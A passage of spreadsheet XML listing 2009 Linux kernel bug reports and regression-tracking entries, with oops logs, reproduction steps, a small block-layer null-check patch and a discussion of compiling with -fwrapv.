    <t>BUG: filefrag errors on non-journal ext4 filesystem</t>
  </si>
  <si>
    <t>2009-01-28 16:50 UTC</t>
  </si>
  <si>
    <t>Kazuya Mio</t>
  </si>
  <si>
    <t>2009-02-03 11:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.29-rc1 Distribution: CentOS 5.2 (x86_64) Hardware Environment: MY20R/B-4(CPU: Intel(R) Core(TM) 2 Duo E4400, MEM: 2560MB Software Environment: e2fsprogs-1.41.3 Problem Description: 2.6.29-rc1 + the most recent ext4 patch queue When mounting ext4 filesystem without a journal, BUG_ON panic occurs by executing filefrag command. The following error messages show in the system logs: Jan 27 15:56:53 bsdB08126 kernel: kernel BUG at fs/ext4/inode.c:2825! Jan 27 15:56:53 bsdB08126 kernel: invalid opcode: 0000 [0000001] SMP Jan 27 15:56:53 bsdB08126 kernel: last sysfs file: /sys/class/drm/card0/dev Jan 27 15:56:53 bsdB08126 kernel: CPU 0 Jan 27 15:56:53 bsdB08126 kernel: Modules linked in: i915 drm i2c_algo_bit autofs4 hidp rfcomm l2cap bluetooth sunrpc iptable_filter ip_tables ip6t_REJECT xt_tcpudp ip6table_filter ip6_tables x_tables dm_mirror dm_region_hash dm_log dm_multipath dm_mod sbs sbshc battery acpi_memhotplug ac ipv6 lp snd_hda_codec_realtek snd_hda_intel sg snd_hda_codec snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm serio_raw sr_mod rtc_cmos cdrom parport_pc snd_timer rtc_core parport rtc_lib snd button i2c_i801 e1000e soundcore pcspkr snd_page_alloc i2c_core ata_piix libata sd_mod scsi_mod uhci_hcd ohci_hcd ehci_hcd [last unloaded: microcode] Jan 27 15:56:53 bsdB08126 kernel: Pid: 3902, comm: filefrag Not tainted 2.6.29-rc1 0000012 Jan 27 15:56:53 bsdB08126 kernel: RIP: 0010:[&lt;ffffffff803043a9&gt;] [&lt;ffffffff803043a9&gt;] ext4_bmap+0x5a/0xc8 Jan 27 15:56:53 bsdB08126 kernel: RSP: 0018:ffff880064857ea8 EFLAGS: 00010202 Jan 27 15:56:53 bsdB08126 kernel: RAX: 0000000000000000 RBX: ffff88006380d490 RCX: 0000000000000015 Jan 27 15:56:53 bsdB08126 kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88006380d5a8 Jan 27 15:56:53 bsdB08126 kernel: RBP: ffff88006380d5a0 R08: ffff880064857e68 R09: 0000000000000000 Jan 27 15:56:53 bsdB08126 kernel: R10: 74616d726f662073 R11: ffff8800905d6380 R12: 00000000000063ff Jan 27 15:56:53 bsdB08126 kernel: R13: 00000000000063ff R14: 0000000000000003 R15: 0000000000000000 Jan 27 15:56:53 bsdB08126 kernel: FS: 00007f4b8eb586e0(0000) GS:ffffffff8086c080(0000) knlGS:0000000000000000 Jan 27 15:56:53 bsdB08126 kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jan 27 15:56:53 bsdB08126 kernel: CR2: 00000031b8e62b80 CR3: 0000000062015000 CR4: 00000000000006e0 Jan 27 15:56:53 bsdB08126 kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Jan 27 15:56:54 bsdB08126 kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Jan 27 15:56:54 bsdB08126 kernel: Process filefrag (pid: 3902, threadinfo ffff880064856000, task ffff88007386e970) Jan 27 15:56:54 bsdB08126 kernel: Stack: Jan 27 15:56:54 bsdB08126 kernel: 0000000000000001 ffff88006380d5a0 00007fff96b70fb4 00000000000063ff Jan 27 15:56:55 bsdB08126 kernel: 0000000000000000 ffffffff802aa43f 0000000000000000 0000000000000000 Jan 27 15:56:55 bsdB08126 kernel: 0000000000000000 0000000000000000 0000000000000000 ffffffff804e9068 Jan 27 15:56:56 bsdB08126 kernel: Call Trace: Jan 27 15:56:56 bsdB08126 kernel: [&lt;ffffffff802aa43f&gt;] ? do_vfs_ioctl+0x2bf/0x4a3 Jan 27 15:56:56 bsdB08126 kernel: [&lt;ffffffff804e9068&gt;] ? do_page_fault+0x3a8/0x72f Jan 27 15:56:57 bsdB08126 kernel: [&lt;ffffffff802aa674&gt;] ? sys_ioctl+0x51/0x70 Jan 27 15:56:58 bsdB08126 kernel: [&lt;ffffffff8020bedb&gt;] ? system_call_fastpath+0x16/0x1b Jan 27 15:56:58 bsdB08126 kernel: Code: 08 74 08 48 89 ef e8 28 fe f6 ff 48 8b 83 f8 00 00 00 48 8b 80 90 02 00 00 48 8b 80 90 41 00 00 48 85 c0 75 0f f6 43 a0 01 74 04 &lt;0f&gt; 0b eb fe 48 85 c0 74 42 8b 43 a0 a8 01 74 3b 83 e0 fe 89 43 Jan 27 15:56:58 bsdB08126 kernel: RIP [&lt;ffffffff803043a9&gt;] ext4_bmap+0x5a/0xc8 Jan 27 15:56:58 bsdB08126 kernel: RSP &lt;ffff880064857ea8&gt; Jan 27 15:56:58 bsdB08126 kernel: ---[ end trace 60cf7e0d66d2b1ce ]--- Whenever __ext4_journalled_writepage() or ext4_journalled_write_end() is called, EXT4_STATE_JDATA is set in i_state in spite of non-journal ext4. That's weird. Steps to reproduce: 1. mke2fs -O extents /dev/sdaX 2. mount -t ext4 /dev/sdaX /mnt/mpX 3. dd if=/dev/urandom of=/mnt/mpX/file bs=1K count=102400 4. filefrag /mnt/mpX/file</t>
  </si>
  <si>
    <t>2.6.29-rc4</t>
  </si>
  <si>
    <t>using &gt;= linux-2.6.26-gentoo-r4 machine hangs when start hibernating</t>
  </si>
  <si>
    <t>2009-01-31 04:39 UTC</t>
  </si>
  <si>
    <t>Karlis.Repsons</t>
  </si>
  <si>
    <t>2011-07-30 05:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.25-gentoo-r7 Earliest failing kernel version:linux-2.6.26-gentoo-r4 Distribution:gentoo Hardware Environment:x86-64 Software Environment:running gentoo, no Xorg in test Problem Description: so I try doing this: echo 17179869184 &gt; /sys/power/image_size echo disk &gt; /sys/power/state and it results in hang with 2.6.26. Console gets completely blank, no disk access and for more than minute like that, so I have to hard-reset the system. Also can't access with ssh during that hang. Steps to reproduce: get Asus P5Q-E with core2 duo, install gentoo, compile kernels mentioned above and for newer one take config of .25, make mrproper &amp;&amp; cp /path/to/config.25 .config &amp;&amp; make menuconfig &amp;&amp; make -j3 &amp;&amp; make modules_install I changed nothing in menuconfig. and do echo ... Comments: Can attach .config or send by mail, but there is little of helpful in it, I think. No nvidia was compiled for testing kernels, so no binary drivers were loaded.</t>
  </si>
  <si>
    <t>weak signal with rtl8180 and Belking 701f</t>
  </si>
  <si>
    <t>2009-01-31 12:29 UTC</t>
  </si>
  <si>
    <t>drkludge</t>
  </si>
  <si>
    <t>2010-08-23 14:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown... never worked for me Earliest failing kernel version: 2.26.26, maybe earlier Distribution: arch linux Hardware Environment: * ibm thinkpad a21m, 800 Mhz Pentium III (Coppermine) GenuineIntel * lspci -vv: &lt;snip /&gt; 06:00.0 Ethernet controller: Belkin Device 701f (rev 20) Subsystem: Belkin Device 701f Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (8000ns min, 16000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at 3000 [size=256] Region 1: Memory at 3c000000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ndiswrapper Kernel modules: rtl8180 &lt;snip /&gt; (this is a pcmcia card) Software Environment: ndiswrapper v1.53 wireless_tools v29 Problem Description: using ndiswrapper v1.53 with the windows net8185 driver, 'iwlist wlan0 scan' shows 3 - 5 networks, with signal strengths ranging from 30 - 60%. using the rtl8180 driver, 'iwlist wlan0 scan' shows at best one network, at signal strength 9 - 16%, and cannot connect to the network i connect to (almost) flawlessly with ndiswrapper. i wish i could give more info than that, but if you ask, you shall receive. fwiw, i remember months ago finding suggestions relating to the rate control algorithm selected by mac80211, now i can't find those threads for the life of me. Steps to reproduce: modprobe ndiswrapper # with net8185 installed iwlist wlan0 scan iwconfig wlan0 essid "network" dhcpcd wlan0 #go online relatively happily! modprobe -r ndiswrapper modprobe rtl8180 iwlist wlan0 scan #if you're lucky, see a network iwconig wlan0 essid "network" #watch ap probe timeout</t>
  </si>
  <si>
    <t>NULL pointer dereference in blk_queue_io_stat</t>
  </si>
  <si>
    <t>2.6.29-rc3-64-00113-gbc58ba9</t>
  </si>
  <si>
    <t>2009-01-31 23:58 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.29-rc3-64-00112-g7598909e3ee2a08726276d6415b69dadb52d0d76 Earliest failing kernel version: 2.6.29-rc3-64-00113-gbc58ba9468d94d62c56ab9b47173583ec140b165 Distribution: Debian Hardware Environment: AMD 64bit kernel, 32bit userspace Software Environment: hddtemp (happens to run on hdd connected to sata_nv) Problem Description: Since commit bc58ba9468d94d62c56ab9b47173583ec140b165 my box crashes during startup when hddtemp tries to start. It occurs when hddtemp tries to issue INQUIRY request through SG_IO on /dev/sg0. During completion of request new accounting code crashes because request being completed happens to have non-NULL rq_disk, but that disk happens to have NULL queue. Backtrace from oopses is: __end_that_request_first + 0xe1/0x380 end_that_request_data + 0x2c/0x70 blk_end_io + 0x2d/0xb0 blk_end_request + 0xe/0x10 scsi_io_completion + 0x133/0x4e0 scsi_finish_command + 0xac/0xe0 scsi_softirq_done + 0xb8/0140 blk_done_softirq + 0x85/0xa0 __do_softirq + 0x7d/0x140 call_softirq + 0x1c/0x30 do_softirq + 0x65/0xb0 irq_exit + 0x8d/0xb0 do_IRQ + 0xa/0x140 For now I've put this into my tree... diff --git a/block/blk-core.c b/block/blk-core.c index ca69f3d..da3c9fa 100644 --- a/block/blk-core.c +++ b/block/blk-core.c @@ -69,7 +69,7 @@ static void drive_stat_acct(struct request *rq, int new_io) int rw = rq_data_dir(rq); int cpu; - if (!blk_fs_request(rq) || !disk || !blk_queue_io_stat(disk-&gt;queue)) + if (!blk_fs_request(rq) || !disk || !disk-&gt;queue || !blk_queue_io_stat(disk-&gt;queue)) return; cpu = part_stat_lock(); @@ -1667,7 +1667,7 @@ static void blk_account_io_completion(struct request *req, unsigned int bytes) { struct gendisk *disk = req-&gt;rq_disk; - if (!disk || !blk_queue_io_stat(disk-&gt;queue)) + if (!disk || !disk-&gt;queue || !blk_queue_io_stat(disk-&gt;queue)) return; if (blk_fs_request(req)) { @@ -1686,7 +1686,7 @@ static void blk_account_io_done(struct request *req) { struct gendisk *disk = req-&gt;rq_disk; - if (!disk || !blk_queue_io_stat(disk-&gt;queue)) + if (!disk || !disk-&gt;queue || !blk_queue_io_stat(disk-&gt;queue)) return; /* Steps to reproduce: Run 'hddtemp /dev/sg0'</t>
  </si>
  <si>
    <t>fw_card_add adds card to the list even on enable failure</t>
  </si>
  <si>
    <t>2.6.29-rc3</t>
  </si>
  <si>
    <t>2009-02-01 01:26 UTC</t>
  </si>
  <si>
    <t>2009-02-09 14:36 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: never Earliest failing kernel version: always Distribution: Debian Hardware Environment: Two "FireWire (IEEE 1394): Texas Instruments TSB43AB23 IEEE-1394a-2000 Controller (PHY/Link)" devices in one box, with on-board device ill... Software Environment: New FW stack Problem Description: When Vista boots on the hardware, it does something bad to the on-board firewire adapter, so it starts failing to enable card: firewire_ohci 0000:01:09.0: PCI INT A -&gt; Link[APC4] -&gt; GSI 19 (level, low) -&gt; IRQ 19 firewire_ohci 0000:01:09.0: setting latency timer to 64 firewire_ohci: failed to set phy reg bits. firewire_ohci 0000:01:09.0: PCI INT A disabled firewire_ohci: probe of 0000:01:09.0 failed with error -5 When that happens, fw_add_card adds card to the list of all devices, but then returns an error. Caller then thinks that things went wrong, and releases card structure. Then when fw_add_card is invoked for second device, kernel reports linked list corruption, as first (released) card is still in the list... Steps to reproduce: Get box with one broken and one working card, and try loading firewire-ohci module.</t>
  </si>
  <si>
    <t>iwlagn error messages when the card is sending a lot of data</t>
  </si>
  <si>
    <t>2009-02-01 07:59 UTC</t>
  </si>
  <si>
    <t>Brandon Ehle</t>
  </si>
  <si>
    <t>2009-06-04 12:53 UTC</t>
  </si>
  <si>
    <t>Ubuntu 8.10 Intel Corporation PRO/Wireless 5300 AGN [Shiloh] Network Connection When sending a large amount of data, sometimes the kernel starts reporting the errors below. This is running with debug50=0xffffffff when loading the module. The reason I noticed this was because the card seems to stop working every once in a while unless you unload and reload the module and I was hoping for more information as to what might be happening. I'm not sure if the errors below are the source of my problem or just harmless messages. I can definitely reproduce the problem with a ping flood, but this is a somewhat contrived case, but the same message will also occur during upload heavy traffic. modprobe -rv iwlagn modprobe -v iwlagn debug50=0xffffffff ping -f -s 60000 &lt;ip&gt; [ 3220.481562] cfg80211: Using static regulatory domain info [ 3220.481566] cfg80211: Regulatory domain: US [ 3220.481568] (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) [ 3220.481571] (2402000 KHz - 2472000 KHz @ 40000 KHz), (600 mBi, 2700 mBm) [ 3220.481574] (5170000 KHz - 5190000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) [ 3220.481576] (5190000 KHz - 5210000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) [ 3220.481579] (5210000 KHz - 5230000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) [ 3220.481581] (5230000 KHz - 5330000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) [ 3220.481584] (5735000 KHz - 5835000 KHz @ 40000 KHz), (600 mBi, 3000 mBm) [ 3220.481586] cfg80211: Calling CRDA for country: US [ 3220.542969] iwlagn: Intel(R) Wireless WiFi Link AGN driver for Linux, 1.3.27ks [ 3220.542975] iwlagn: Copyright(c) 2003-2008 Intel Corporation [ 3220.543232] iwlagn 0000:0b:00.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 3220.543247] iwlagn 0000:0b:00.0: setting latency timer to 64 [ 3220.543545] iwlagn: Detected Intel Wireless WiFi Link 5300AGN REV=0x24 [ 3220.564493] iwlagn: Tunable channels: 13 802.11bg, 24 802.11a channels [ 3220.564993] wmaster0 (iwlagn): not using net_device_ops yet [ 3220.566090] phy0: Selected rate control algorithm 'iwl-agn-rs' [ 3220.566174] wlan0 (iwlagn): not using net_device_ops yet [ 3224.591408] iwlagn 0000:0b:00.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 3224.591552] iwlagn 0000:0b:00.0: irq 34 for MSI/MSI-X [ 3224.591605] iwlagn 0000:0b:00.0: firmware: requesting iwlwifi-5000-1.ucode [ 3224.598844] iwlagn loaded firmware version 5.4.1.16 [ 3224.777679] Registered led device: iwl-phy0:radio [ 3224.777706] Registered led device: iwl-phy0:assoc [ 3224.777727] Registered led device: iwl-phy0:RX [ 3224.777746] Registered led device: iwl-phy0:TX [ 3224.806663] ADDRCONF(NETDEV_UP): wlan0: link is not ready [ 3226.576539] wlan0: authenticate with AP 00:0a:79:5c:cf:a8 [ 3226.579414] wlan0: authenticated [ 3226.579420] wlan0: associate with AP 00:0a:79:5c:cf:a8 [ 3226.581588] wlan0: RX AssocResp from 00:0a:79:5c:cf:a8 (capab=0x421 status=0 aid=1) [ 3226.581596] wlan0: associated [ 3226.599592] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready [ 3226.599692] wlan0: disassociating by local choice (reason=3) [ 3231.667639] wlan0: authenticate with AP 00:16:01:e6:81:74 [ 3231.669572] wlan0: authenticate with AP 00:16:01:e6:81:74 [ 3231.670414] wlan0: authenticated [ 3231.670419] wlan0: associate with AP 00:16:01:e6:81:74 [ 3231.681024] wlan0: RX AssocResp from 00:16:01:e6:81:74 (capab=0x431 status=0 aid=1) [ 3231.681028] wlan0: associated [ 3237.256049] wlan0: no IPv6 routers present [ 3243.343560] iwlagn: No space for Tx [ 3243.343566] iwlagn: Error sending REPLY_TX_LINK_QUALITY_CMD: enqueue_hcmd failed: -28 [ 3243.343570] iwlagn: No space for Tx [ 3243.343572] iwlagn: Error sending REPLY_TX_LINK_QUALITY_CMD: enqueue_hcmd failed: -28 [ 3243.343575] iwlagn: No space for Tx [ 3243.343577] iwlagn: Error sending REPLY_TX_LINK_QUALITY_CMD: enqueue_hcmd failed: -28 [ 3243.343580] iwlagn: No space for Tx etc...</t>
  </si>
  <si>
    <t>Kernel should be built with -fwrapv</t>
  </si>
  <si>
    <t>2009-02-01 11:10 UTC</t>
  </si>
  <si>
    <t>2009-03-23 08:52 UTC</t>
  </si>
  <si>
    <t>other_configuration@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Pointer arithmetic overflow is undefined (and gcc may assume that it never happens), same for signed arithmetic overflow. Building the kernel with -Wstrict-overflow=3 shows new 287 warnings, a quick look at one of the warnings shows that this is a real concern as gcc does compile code as if the wrap would never happen. Here is one that looks real: fs/open.c: In function ‘sys_fallocate’: fs/open.c:419: warning: assuming signed overflow does not occur when simplifying conditional to constant fs/open.c: 418 /* Check for wrap through zero too */ 419 if (((offset + len) &gt; inode-&gt;i_sb-&gt;s_maxbytes) || ((offset + len) &lt; 0)) 420 goto out_fput; offset and len are both signed types, so gcc assumes that signed arithmetic overflow doesn't occur. To fix this the kernel should be built with -fwrapv, which means that signed (and pointer) arithmetic overflow is defined: it wraps. (see the gcc manpage on -fwrapv and -fno-strict-overflow for more details). Here is what gcc produces by default: /* Check for wrap through zero too */ if (((offset + len) &gt; inode-&gt;i_sb-&gt;s_maxbytes) || ((offset + len) &lt; 0)) 1053: 4b 8d 04 26 lea (%r14,%r12,1),%rax 1057: 48 8b 97 f8 00 00 00 mov 0xf8(%rdi),%rdx 105e: 48 3b 42 28 cmp 0x28(%rdx),%rax 1062: 77 2f ja 1093 &lt;sys_fallocate+0x107&gt; 1064: 48 85 c0 test %rax,%rax 1067: 78 2a js 1093 &lt;sys_fallocate+0x107&gt; Here is what gcc produces with -fwrapv: /* Check for wrap through zero too */ if (((offset + len) &gt; inode-&gt;i_sb-&gt;s_maxbytes) || ((offset + len) &lt; 0)) 1325: 48 8d 04 11 lea (%rcx,%rdx,1),%rax 1329: 48 8b b7 f8 00 00 00 mov 0xf8(%rdi),%rsi 1330: 48 3b 46 28 cmp 0x28(%rsi),%rax 1334: 77 2d ja 1363 &lt;sys_fallocate+0x133&gt; 1336: 48 85 c0 test %rax,%rax Obviosuly the (offset+len) &lt; 0 check was deleted, on the assumption that if it happens it is undefined behaviour -&gt; it never happens.</t>
  </si>
  <si>
    <t>tg3 dead after resume</t>
  </si>
  <si>
    <t>2009-02-01 13:47 UTC</t>
  </si>
  <si>
    <t>2009-02-08 12:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc3: tg3 dead after resume Submitter : Parag Warudkar &lt;parag.lkml@gmail.com&gt; Date : 2009-01-29 0:14 References : http://marc.info/?l=linux-kernel&amp;m=123318968501524&amp;w=4 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123336237425999&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>virt-manager broken on 2.6.29-rc2</t>
  </si>
  <si>
    <t>2009-02-01 14:22 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:24 UTC</t>
  </si>
  <si>
    <t>Subject : virt-manager broken on 2.6.29-rc2 Submitter : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Date : 2009-01-29 5:21 References : http://marc.info/?l=linux-kernel&amp;m=123320655819589&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>CRED changes causing setuid failures</t>
  </si>
  <si>
    <t>2009-02-01 14:27 UTC</t>
  </si>
  <si>
    <t>2009-02-08 11:40 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-rc2 regression] CRED changes causing setuid failures Submitter : David Smith &lt;dsmith@redhat.com&gt; Date : 2009-01-29 21:35 References : http://marc.info/?l=linux-kernel&amp;m=123326501813668&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit d84f4f992cbd76e8f39c488cf0c5d123843923b1 Author: David Howells &lt;dhowells@redhat.com&gt; Date: Fri Nov 14 10:39:23 2008 +1100 CRED: Inaugurate COW credentials Signed-off-by: David Howells &lt;dhowells@redhat.com&gt; Acked-by: James Morris &lt;jmorris@namei.org&gt; Signed-off-by: James Morris &lt;jmorris@namei.org&gt; First-Bad-Commit : d84f4f992cbd76e8f39c488cf0c5d123843923b1</t>
  </si>
  <si>
    <t>Commit 31a12666d8f0c22235297e1c1575f82061480029 slows down Berkeley DB</t>
  </si>
  <si>
    <t>commit 31a12666d8f0c22235297e1c1575f82061480029</t>
  </si>
  <si>
    <t>2009-02-01 14:33 UTC</t>
  </si>
  <si>
    <t>2009-02-12 13:33 UTC</t>
  </si>
  <si>
    <t>Subject : Commit 31a12666d8f0c22235297e1c1575f82061480029 slows down Berkeley DB Submitter : Jan Kara &lt;jack@suse.cz&gt; Date : 2009-01-30 1:23 References : http://marc.info/?l=linux-kernel&amp;m=123327862901800&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 31a12666d8f0c22235297e1c1575f82061480029 Author: Nick Piggin &lt;npiggin@suse.de&gt; Date: Tue Jan 6 14:39:04 2009 -0800 mm: write_cache_pages cyclic fix Signed-off-by: Nick Piggin &lt;npiggin@suse.de&gt; Cc: Chris Mason &lt;chris.mason@oracle.com&gt; Cc: Dave Chinner &lt;david@fromorbit.com&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; First-Bad-Commit : 31a12666d8f0c22235297e1c1575f82061480029</t>
  </si>
  <si>
    <t>Suspend regression, hang after matroxfb</t>
  </si>
  <si>
    <t>2009-02-01 14:56 UTC</t>
  </si>
  <si>
    <t>2009-02-08 12:46 UTC</t>
  </si>
  <si>
    <t>Subject : Suspend regression, hang after matroxfb Submitter : Eric Sesterhenn &lt;snakebyte@gmx.de&gt; Date : 2009-01-29 12:58 References : http://thread.gmane.org/gmane.linux.power-management.general/12640 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123335902122029&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fb_mmap: circular locking dependency on hibernation</t>
  </si>
  <si>
    <t>2009-02-01 14:59 UTC</t>
  </si>
  <si>
    <t>2009-02-08 14:05 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-rc2] fb_mmap: circular locking dependency on hibernation Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2009-01-27 18:37 References : http://marc.info/?l=linux-kernel&amp;m=123308162731408&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc powerpc G5 Xorg legacy_mem regression</t>
  </si>
  <si>
    <t>2009-02-01 15:27 UTC</t>
  </si>
  <si>
    <t>2009-02-14 14:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc powerpc G5 Xorg legacy_mem regression Submitter : Hugh Dickins &lt;hugh@veritas.com&gt; Date : 2009-01-21 21:12 References : http://marc.info/?l=linux-kernel&amp;m=123257250431870&amp;w=4 Handled-By : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit d3a54014e2a94bd37b7dee5e76e03f7bc4fab49a Author: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; Date: Wed Nov 12 14:38:53 2008 +1100 PCI: Add legacy_io/mem to all busses Signed-off-by: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; First-Bad-Commit : d3a54014e2a94bd37b7dee5e76e03f7bc4fab49a</t>
  </si>
  <si>
    <t>v2.6.29-rc2 libata sff 32bit PIO regression</t>
  </si>
  <si>
    <t>2009-02-01 15:32 UTC</t>
  </si>
  <si>
    <t>2009-03-05 09:30 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.29-rc2 gets HSM violations for CD drive Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2009-01-23 23:52 References : http://marc.info/?l=linux-kernel&amp;m=123275478111406&amp;w=4 Handled-By : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123254501314058&amp;w=2 Notify-Also : Hugh Dickins &lt;hugh@veritas.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sync-Regression in 2.6.28.2?</t>
  </si>
  <si>
    <t>2009-02-01 15:35 UTC</t>
  </si>
  <si>
    <t>2009-02-22 02:03 UTC</t>
  </si>
  <si>
    <t>Subject : sync-Regression in 2.6.28.2? Submitter : Ralf Hildebrandt &lt;Ralf.Hildebrandt@charite.de&gt; Date : 2009-01-27 9:35 References : http://marc.info/?l=linux-kernel&amp;m=123304977706620&amp;w=4 Notify-Also : Federico Cuello &lt;fedux@lugmen.org.ar&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at kernel/cgroup.c:398!</t>
  </si>
  <si>
    <t>2009-02-01 15:48 UTC</t>
  </si>
  <si>
    <t>2009-02-04 15:33 UTC</t>
  </si>
  <si>
    <t>Paul Menage</t>
  </si>
  <si>
    <t>Subject : kernel BUG at kernel/cgroup.c:398! Submitter : Bharata B Rao &lt;bharata@linux.vnet.ibm.com&gt; Date : 2009-01-28 15:49 References : http://marc.info/?l=linux-kernel&amp;m=123315721707796&amp;w=4 Notify-Also : Paul Menage &lt;menage@google.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hard lockup when interrupting cdda2wav</t>
  </si>
  <si>
    <t>2009-02-01 15:51 UTC</t>
  </si>
  <si>
    <t>2010-09-03 09:05 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28 regression: hard lockup when interrupting cdda2wav Submitter : Matthias Reichl &lt;hias@horus.com&gt; Date : 2009-01-28 16:41 References : http://marc.info/?l=linux-kernel&amp;m=123316111415677&amp;w=4 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[Suspend regression][DRM, RADEON]</t>
  </si>
  <si>
    <t>2009-02-01 15:56 UTC</t>
  </si>
  <si>
    <t>2009-02-25 14:56 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-rc3][Suspend regression][DRM, RADEON] Submitter : etienne &lt;etienne.basset@numericable.fr&gt; Date : 2009-01-28 22:00 References : http://marc.info/?l=linux-kernel&amp;m=123318030419558&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit a9d51a5ad1154b5b20add1e8d30a5564f8aabbe9 Author: Dave Airlie &lt;airlied@linux.ie&gt; Date: Sun Dec 7 12:02:21 2008 +1000 drm: reorganise start and load. Make sure we have the primary node so the device can add maps. Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : a9d51a5ad1154b5b20add1e8d30a5564f8aabbe9</t>
  </si>
  <si>
    <t>WOL with forcedeth broken since f55c21fd9a92a444e55ad1ca4e4732d56661bf2e</t>
  </si>
  <si>
    <t>commit f55c21fd9a92a444e55ad1ca4e4732d56661bf2e</t>
  </si>
  <si>
    <t>2009-02-01 16:05 UTC</t>
  </si>
  <si>
    <t>2009-03-14 14:21 UTC</t>
  </si>
  <si>
